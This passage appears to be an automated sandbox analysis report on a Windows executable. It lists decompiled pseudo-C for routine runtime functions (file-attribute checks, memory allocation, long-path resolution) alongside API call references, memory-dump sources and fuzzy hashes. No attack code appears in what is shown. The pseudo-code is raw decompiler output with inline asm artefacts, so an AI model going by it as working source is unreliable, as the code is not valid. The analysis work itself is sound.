				void* _t15;
				intOrPtr _t16;
				intOrPtr* _t17;

				_t17 = __eax;
				_t1 = _t17 + 0x5c; // 0x27365
				_push( *_t1);
				_t15 =  *((intOrPtr*)( *__eax + 0xc8))();
				 *(__eax + 0x98) =  *(__eax + 0x98) | 0x00000004;
				if(( *(__eax + 0x1c) & 0x00000002) != 0) {
					_t10 = _t17 + 0x58; // 0x756c6156
					_t16 =  *_t10;
					 *((intOrPtr*)(__eax + 0x1b8)) = _t16;
					return _t16;
				}
				return _t15;
			}






                                                                    0x005118ba
                                                                    0x005118bd
                                                                    0x005118c0
                                                                    0x005118cb
                                                                    0x005118d1
                                                                    0x005118dc
                                                                    0x005118de
                                                                    0x005118de
                                                                    0x005118e1
                                                                    0x00000000
                                                                    0x005118e1
                                                                    0x005118e9

                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00027365,00000000,00000000,004C0068,006083EC,?,00000000,?,00000001,00000000,00000000,00000000,?,0068D5D0,00000001), ref: 005118CB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                                    • Instruction ID: 9fcb5f38b0df23c263da8a60913ea9fccafb23266d8756c351c2c96681b23a4d
                                                                    • Opcode Fuzzy Hash: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                                    • Instruction Fuzzy Hash: 70E09A712056405BEB84DE5CC4C5B957BE9AF49214F1440E5ED498B25BC7749C48CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C68A4(void* __eax) {
				signed char _t7;

				_t7 = GetFileAttributesW(E0040B278(__eax)); // executed
				if(_t7 == 0xffffffff || (_t7 & 0x00000010) == 0 || (_t7 & 0x00000004) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                    0x005c68af
                                                                    0x005c68b7
                                                                    0x005c68c5
                                                                    0x005c68c6
                                                                    0x005c68c9
                                                                    0x005c68c9

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                                    • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                                    • Opcode Fuzzy Hash: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                                    • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C685C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C685C(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesW(E0040B278(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                    0x005c6867
                                                                    0x005c686f
                                                                    0x005c6878
                                                                    0x005c6879
                                                                    0x005c687c
                                                                    0x005c687c

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005CD6D7,00000000), ref: 005C6867
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                                    • Instruction ID: 78aee2f50b20cc69f9a983c300c852fe0a8819bfcc82724499c751dbdfa7c08b
                                                                    • Opcode Fuzzy Hash: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                                    • Instruction Fuzzy Hash: 86C08CA02412000A6E1065FE1CC9E5902E85E0533A3240B6EF438E22E3D629CAA3201A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00424020, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E00424020(void* __eax) {
				int _t4;

				_t4 = SetCurrentDirectoryW(E0040B278(__eax)); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                    0x0042402b
                                                                    0x00424033
                                                                    0x00424037

                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID:
                                                                    • API String ID: 1611563598-0
                                                                    • Opcode ID: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                                    • Instruction ID: daf6799c843f8394e9bb8cef5a1a486137c4a768e82a56cfe4f83ef7845b6ded
                                                                    • Opcode Fuzzy Hash: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                                    • Instruction Fuzzy Hash: 9AB012A27903400ACE0075FF0CC9D1D00CCD95920F7200FBFB409D2143D57EC484001C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E0042B8A3() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(0x42b8c1);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}






                                                                    0x0042b8a5
                                                                    0x0042b8a8
                                                                    0x0042b8ab
                                                                    0x0042b8b4
                                                                    0x0042b8b9

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                    • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                                    • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                    • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006ACE20() {
				struct HINSTANCE__* _t2;

				 *0x6d68a8 = 0;
				if( *0x6d68a4 != 0) {
					_t2 =  *0x6d68a4; // 0x0
					FreeLibrary(_t2); // executed
					 *0x6d68a4 = 0;
					return 0;
				}
				return 0;
			}




                                                                    0x006ace22
                                                                    0x006ace2e
                                                                    0x006ace30
                                                                    0x006ace36
                                                                    0x006ace3d
                                                                    0x00000000
                                                                    0x006ace3d
                                                                    0x006ace42

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                    • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                                    • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                    • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0047845C(intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t14;
				void _t15;
				void* _t24;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x6d4ff8 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x6d4ff4; // 0x0
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E0040714C(0x6c7a94, _t24, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00478454(_t2, 0x478434);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00478454(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x6d4ff8;
						 *0x6d4ff8 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x6d4ff4 = _t35;
				}
				_t25 =  *0x6d4ff8;
				 *0x6d4ff8 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x6d4ff8;
			}










                                                                    0x0047846a
                                                                    0x0047847a
                                                                    0x0047847f
                                                                    0x00478481
                                                                    0x00478486
                                                                    0x00478488
                                                                    0x00478495
                                                                    0x0047849f
                                                                    0x004784a7
                                                                    0x004784aa
                                                                    0x004784aa
                                                                    0x004784ad
                                                                    0x004784ad
                                                                    0x004784b0
                                                                    0x004784ba
                                                                    0x004784bf
                                                                    0x004784c2
                                                                    0x004784c4
                                                                    0x004784cb
                                                                    0x004784d2
                                                                    0x004784d2
                                                                    0x004784da
                                                                    0x004784df
                                                                    0x004784e4
                                                                    0x004784ea
                                                                    0x004784f1

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                                    • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                                    • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                                    • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004056E8(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E0040567C(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x6cfaf4 = 0;
					return 0;
				} else {
					_t10 =  *0x6cfae0; // 0x6cfadc
					_t14 = _t4;
					 *_t14 = 0x6cfadc;
					 *0x6cfae0 = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x6cfaf4 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x6cfaf0 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                    0x004056ea
                                                                    0x004056ec
                                                                    0x004056ff
                                                                    0x00405706
                                                                    0x00405758
                                                                    0x00405761
                                                                    0x00405708
                                                                    0x00405708
                                                                    0x0040570e
                                                                    0x00405710
                                                                    0x00405716
                                                                    0x0040571b
                                                                    0x0040571e
                                                                    0x00405722
                                                                    0x0040572d
                                                                    0x0040573a
                                                                    0x00405742
                                                                    0x00405744
                                                                    0x00405751
                                                                    0x00405755
                                                                    0x00405755

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                    • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                                    • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                    • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040E0D4(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040E0B0(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040E0B0(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040DAF8( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040E0B0(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040DAF8(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040DAF8( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040DAF8(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040DAF8(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                    0x0040e0e0
                                                                    0x0040e0e3
                                                                    0x0040e0e9
                                                                    0x0040e0f6
                                                                    0x0040e0fa
                                                                    0x0040e139
                                                                    0x0040e140
                                                                    0x0040e180
                                                                    0x00000000
                                                                    0x0040e142
                                                                    0x0040e14a
                                                                    0x0040e15b
                                                                    0x0040e161
                                                                    0x0040e167
                                                                    0x0040e16f
                                                                    0x0040e175
                                                                    0x0040e183
                                                                    0x0040e185
                                                                    0x0040e188
                                                                    0x0040e18a
                                                                    0x0040e18c
                                                                    0x0040e18c
                                                                    0x0040e18f
                                                                    0x0040e197
                                                                    0x0040e1a8
                                                                    0x0040e26f
                                                                    0x0040e1ba
                                                                    0x0040e1be
                                                                    0x0040e1c0
                                                                    0x0040e1c2
                                                                    0x0040e1c4
                                                                    0x0040e1c4
                                                                    0x0040e1cf
                                                                    0x0040e1df
                                                                    0x0040e1e3
                                                                    0x0040e1e5
                                                                    0x0040e1e7
                                                                    0x0040e1e9
                                                                    0x0040e1e9
                                                                    0x0040e1ef
                                                                    0x0040e207
                                                                    0x0040e20e
                                                                    0x0040e214
                                                                    0x0040e230
                                                                    0x0040e232
                                                                    0x0040e259
                                                                    0x0040e26b
                                                                    0x0040e26d
                                                                    0x00000000
                                                                    0x0040e26d
                                                                    0x0040e230
                                                                    0x0040e20e
                                                                    0x00000000
                                                                    0x0040e1cf
                                                                    0x0040e285
                                                                    0x0040e285
                                                                    0x0040e197
                                                                    0x0040e175
                                                                    0x0040e161
                                                                    0x0040e14a
                                                                    0x0040e0fc
                                                                    0x0040e107
                                                                    0x0040e10b
                                                                    0x00000000
                                                                    0x0040e10d
                                                                    0x0040e10d
                                                                    0x0040e118
                                                                    0x0040e11c
                                                                    0x0040e121
                                                                    0x00000000
                                                                    0x0040e123
                                                                    0x0040e12f
                                                                    0x0040e12f
                                                                    0x0040e121
                                                                    0x0040e10b
                                                                    0x0040e28a
                                                                    0x0040e293

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
